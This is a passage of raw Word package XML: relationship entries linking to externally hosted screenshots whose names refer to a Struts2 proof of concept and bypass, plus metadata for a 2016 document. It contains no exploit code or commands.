Target="https://www.iswin.org/attach/struts2_poc_bypass_2.png" TargetMode="External"/><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iswin.org/attach/struts2_poc_bypass_5.png" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_bypasspoc_1.png" TargetMode="External"/><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hyperlink" Target="https://www.iswin.org/attach/struts2_poc_bypass_7.png" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_id_2.png" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpe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iswin.org/attach/struts2_poc_1.png" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_poc_bypass_3.png" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_poc_bypass_8.png" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_id_1.png" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iswin.org/attach/struts2_id_3.png"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601F5E-82B8-4C44-9F98-FB0485ED3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691</Words>
  <Characters>3940</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>32</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4622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H4ck0rInj</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>H4ck0rInj</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-11T04:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-11T06:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>